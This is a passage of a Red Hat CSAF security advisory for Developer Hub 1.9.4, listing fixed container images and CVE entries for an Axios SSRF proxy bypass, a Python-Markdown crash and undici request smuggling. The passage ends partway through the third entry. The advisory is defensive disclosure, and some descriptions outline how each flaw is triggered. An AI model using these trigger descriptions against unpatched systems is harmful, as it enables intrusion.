      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Critical"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat Developer Hub 1.9.4 has been released.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2026:13826",
        "url": "https://access.redhat.com/errata/RHSA-2026:13826"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-62718",
        "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-69534",
        "url": "https://access.redhat.com/security/cve/CVE-2025-69534"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-1525",
        "url": "https://access.redhat.com/security/cve/CVE-2026-1525"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-1526",
        "url": "https://access.redhat.com/security/cve/CVE-2026-1526"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-1528",
        "url": "https://access.redhat.com/security/cve/CVE-2026-1528"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-2229",
        "url": "https://access.redhat.com/security/cve/CVE-2026-2229"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-27601",
        "url": "https://access.redhat.com/security/cve/CVE-2026-27601"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
        "url": "https://access.redhat.com/security/cve/CVE-2026-27904"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29063",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29063"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29186",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29186"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-3118",
        "url": "https://access.redhat.com/security/cve/CVE-2026-3118"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32141",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32141"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32280",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32282",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33228",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33228"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33891",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33891"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33894",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33895",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33895"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33896",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33896"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-39983",
        "url": "https://access.redhat.com/security/cve/CVE-2026-39983"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40175",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40175"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40895",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4800",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4800"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4926",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4926"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "external",
        "summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
        "url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
      },
      {
        "category": "external",
        "summary": "https://developers.redhat.com/rhdh/overview",
        "url": "https://developers.redhat.com/rhdh/overview"
      },
      {
        "category": "external",
        "summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
        "url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHDHBUGS-2981",
        "url": "https://issues.redhat.com/browse/RHDHBUGS-2981"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHDHBUGS-2970",
        "url": "https://issues.redhat.com/browse/RHDHBUGS-2970"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHDHBUGS-2967",
        "url": "https://issues.redhat.com/browse/RHDHBUGS-2967"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHDHBUGS-2935",
        "url": "https://issues.redhat.com/browse/RHDHBUGS-2935"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHDHBUGS-2922",
        "url": "https://issues.redhat.com/browse/RHDHBUGS-2922"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHDHBUGS-2920",
        "url": "https://issues.redhat.com/browse/RHDHBUGS-2920"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_13826.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat Developer Hub 1.9.4 release.",
    "tracking": {
      "current_release_date": "2026-06-30T07:26:17+00:00",
      "generator": {
        "date": "2026-06-30T07:26:17+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "5.3.0"
        }
      },
      "id": "RHSA-2026:13826",
      "initial_release_date": "2026-05-05T16:10:46+00:00",
      "revision_history": [
        {
          "date": "2026-05-05T16:10:46+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2026-05-07T15:39:09+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-06-30T07:26:17+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Developer Hub 1.9",
                "product": {
                  "name": "Red Hat Developer Hub 1.9",
                  "product_id": "Red Hat Developer Hub 1.9",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:rhdh:1.9::el9"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Developer Hub"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1777903262"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1777902709"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-operator-bundle@sha256%3A47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1777909942"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64 as a component of Red Hat Developer Hub 1.9",
          "product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.9"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64 as a component of Red Hat Developer Hub 1.9",
          "product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.9"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64 as a component of Red Hat Developer Hub 1.9",
          "product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.9"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-62718",
      "cwe": {
        "id": "CWE-1289",
        "name": "Improper Validation of Unsafe Equivalence in Input"
      },
      "discovery_date": "2026-04-09T15:01:48.111177+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456913"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not correctly handle hostname normalization when evaluating NO_PROXY rules. An attacker can exploit this by crafting requests to loopback addresses (e.g., localhost. or [::1]) which bypass the NO_PROXY configuration and are routed through the configured proxy. This can lead to Server-Side Request Forgery (SSRF) vulnerabilities, enabling attackers to access sensitive internal or loopback services that should otherwise be protected.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw has limited impact due to combination of non-default conditions to exploit: the attacker must be able to control or influence URLs passed to axios in a server-side context, the application must have both `HTTP_PROXY` and `NO_PROXY` configured, and the proxy itself must be positioned to act on the misdirected traffic or have been compromised by the attacker to intercept the rerouted traffic.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456913",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456913"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-62718",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1",
          "url": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2",
          "url": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df",
          "url": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/pull/10661",
          "url": "https://github.com/axios/axios/pull/10661"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/releases/tag/v1.15.0",
          "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"
        }
      ],
      "release_date": "2026-04-09T14:31:46.067000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization"
    },
    {
      "cve": "CVE-2025-69534",
      "cwe": {
        "id": "CWE-617",
        "name": "Reachable Assertion"
      },
      "discovery_date": "2026-03-05T16:01:10.432461+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2444839"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Python-Markdown. Parsing crafted markdown content containing malformed HTML-like sequences causes html.parser.HTMLParser to raise an unhandled AssertionError. This unhandled exception allows an attacker to cause an application crash and potentially disclose sensitive information via its stack trace.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "python-markdown: denial of service via malformed HTML-like sequences",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this flaw, an attacker must be able to supply a specially crafted payload to be processed by an application using Python-Markdown. Additionally, the security impact of this vulnerability is limited to an information disclosure via the unhandled exception stack trace and a denial of service. There is no memory corruption or arbitrary command execution. Due to these reasons, this issue has been rated with an important severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-69534"
        },
        {
          "category": "external",
          "summary": "RHBZ#2444839",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444839"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-69534",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-69534"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69534",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69534"
        },
        {
          "category": "external",
          "summary": "https://github.com/Python-Markdown/markdown",
          "url": "https://github.com/Python-Markdown/markdown"
        },
        {
          "category": "external",
          "summary": "https://github.com/Python-Markdown/markdown/actions/runs/15736122892",
          "url": "https://github.com/Python-Markdown/markdown/actions/runs/15736122892"
        },
        {
          "category": "external",
          "summary": "https://github.com/Python-Markdown/markdown/issues/1534",
          "url": "https://github.com/Python-Markdown/markdown/issues/1534"
        }
      ],
      "release_date": "2026-03-05T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "To mitigate this vulnerability, wrap your markdown parsing function in a try/except block. This catches the unhandled exception, preventing both the application crash and the stack trace leak.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "python-markdown: denial of service via malformed HTML-like sequences"
    },
    {
      "cve": "CVE-2026-1525",
      "cwe": {
        "id": "CWE-444",
        "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
      },
      "discovery_date": "2026-03-12T21:01:33.639277+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2447144"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in undici, a Node.js HTTP/1.1 client. A remote attacker could exploit this vulnerability by sending HTTP/1.1 requests that include duplicate Content-Length headers with different casing (e.g., \"Content-Length\" and \"content-length\"). This can lead to HTTP Request Smuggling, a technique where an attacker sends an ambiguous request that is interpreted differently by a proxy and a backend server. Successful exploitation could result in unauthorized access, cache poisoning, or credential hijacking. It may also cause a Denial of Service (DoS) if strict HTTP parsers reject the malformed requests.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "undici: Undici: HTTP Request Smuggling and Denial of Service due to duplicate Content-Length headers",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Moderate impact. A flaw in the undici Node.js HTTP/1.1 client allows for HTTP Request Smuggling or Denial of Service. This can occur in Red Hat products that use undici and process HTTP requests where user-controlled header names are not case-normalized, or headers are passed as flat arrays.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-1525"
        },
        {
          "category": "external",
          "summary": "RHBZ#2447144",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447144"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-1525",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1525"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://cwe.mitre.org/data/definitions/444.html",
          "url": "https://cwe.mitre.org/data/definitions/444.html"
        },
        {
          "category": "external",
          "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm",
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm"
        },
        {
          "category": "external",
          "summary": "https://hackerone.com/reports/3556037",
          "url": "https://hackerone.com/reports/3556037"
        },
        {
          "category": "external",
          "summary": "https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6",
          "url": "https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
        }
      ],
      "release_date": "2026-03-12T19:56:55.092000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
